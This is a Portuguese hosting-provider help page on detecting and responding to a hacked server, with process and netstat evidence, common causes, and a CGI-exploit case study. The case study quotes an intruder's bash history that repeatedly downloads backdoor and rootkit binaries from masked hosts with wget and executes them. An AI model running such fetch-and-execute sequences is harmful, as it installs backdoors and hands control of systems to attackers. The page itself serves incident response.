Busca


imprimir pdf

Máquina Hackada


Não acontece só aos outros.

Como ver que uma maquina foi hackada?


Um vista de olhos no MRTG nunca engana:






e sobre a máquina encontramos:

root 3632 0.0 1.0 2368 1320 pts/0 S 10:51 0:00 -bash
root 6310 0.0 0.1 476 248 pts/0 S 11:27 0:00 ./ipv6fuck 213.186.34.196 192.88.99.1 2002:d5ba:22c4:: 2001:6b8:0:400
...

root 6360 0.0 0.1 476 244 pts/0 S 11:27 0:00 ./ipv6fuck 213.186.34.196 192.88.99.1 2002:d5ba:22c4:: 2001:6b8:0:400



Visivelmente o hacker pode lançar programas em root. A máquina está então hackada e deve ser reinstalada.

# netstat -tanpu
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
udp 0 0 0.0.0.0:9875 0.0.0.0:* 28823/xc
udp 0 0 0.0.0.0:1052 0.0.0.0:* 28823/xc
udp 0 0 0.0.0.0:6770 0.0.0.0:* 28823/xc
# ps auxw | grep 28823
root 7117 0.0 0.5 1796 748 pts/1 S 11:38 0:00 grep 28823



Existe programas em execução, que têm um pid e que não conseguem ser vistos através do ps, certamente porque ps foi substituído por um ps hackado que filtra todos os programas do hacker para enganar.

# halt

Broadcast message from root (pts/1) Thu Nov 20 11:39:22 2003...

The system is going down for system halt NOW !!


Paramos imediatamente a máquina.

Com sorte temos uma máquina apenas Semi Hackada.

Ver também: Exemplo de Máquina Hackada .


Porquê que a máquina é hackada?


As origens dos problemas são múltiplos, mas podemos resumi-los desta forma:

  • Utiliza telnet. O seu login e password circulam pela Internet em claro e podem ser apanhados a todo momento. Deve utilizar ssh. O seguinte guia fala sobre este assunto: SshSobreServidorDedicado.

  • Utiliza ftp. O seu login e password circulam pela Internet em claro e é a mesmo que a password root. Sftp é a sua solução.

  • Utiliza pop3/imap com a password (que circula sem encriptação) e é a password root. Utilize APOP ou POP3S/IMAPS. O seguinte guia trata sobre este assunto: SmtpPop3Imap.

Se não actualiza a sua máquina com releases ReleasePatchSeguranca, arrisca a ter a sua máquina hackada (mais ou menos 250 scans são efectuados por dia sobre a nossa rede no âmbito de detectar as falhas de segurança).


O que fazer?


Em caso de hack, o seu servidor será posto em modo de rescue FTP automaticamente, e receberá os seus códigos de acesso por e-mail.

Poderá ainda pedir ao suporte para passar o seu servidor para o modo de Rescue, unicamente por ticket incidente, justificando ainda o seu pedido e a sua plena consciência que deverá corrigir o problema antes de re-activar o servidor. Estaremos atentos para o facto de que precisa corrigir as falhas antes de colocar o servidor em funcionamento normal da rede (modo HDD) .


Exemplos de hack


Falha de script CGI

Os sintomas
Um ficheiro g00dies.tgz transferido na pasta /tmp com outros ficheiros x, k, etc...
O programa x é um backdoor. Se executado dará acesso a máquina.
Encontramos o bash.history do utilizador nobody em /tmp, cujo o conteúdo é:

cd /tmp
wget www.#######.com/x
chmod +x x
./s
./x
./x
./x
./x./x
./x
./x
./x
./x
wget www.#######.com/k
chmod +x k
./k -d;
/tmp/x
./x
./x
./x
./x
./x
./x
./
cd /tmp
mkdir .,
cd .,
wget ######.go.ro/vampix
tar zxvf vampix
cd esc
./mingetty
./mingetty
./mingetty
cd /tmp
wget ######.go.ro/g00dies.tgz
tar zxvf g00dies.tgz
cd goodies
mv stealth /tmp
cd /tmp
wget ######.go.ro/smth
chmod +x smth
./smth
cd /tmp
wget ######.go.ro/g00dies.tgz
tar zxvf g00dies.tgz
cd goodies
mv stealth /tmp
/tmp/smth
/tmp/stealth


O que se constata
Conseguimos ver que foram executados comandos em nobody, porém este utilizador é essencialmente utilizado por Apache. Parece que o hacker aproveitou de uma vulnerabilidade de um script CGI.


Resolução
- Kill de todos os processos suspeitos em curso.
O hacker pelos visto não passou por root (pode aproveitar uma falha de um kernel<2.4.24), no entanto, fazermos algumas operações/verificações elementares:

  • Mudar todas as password: root, user, mysql, mail, etc... (vemos que o hacker executou mingetty)
  • Fazer uma procura exaustiva dos ficheiros modificados pelo hack: find /rep -cmin -60 (verifica os ficheiros modificados há menos de uma hora).

- Consulte depois os logs de Apache por volta da hora na qual houve esse hack para encontrar o script em causa.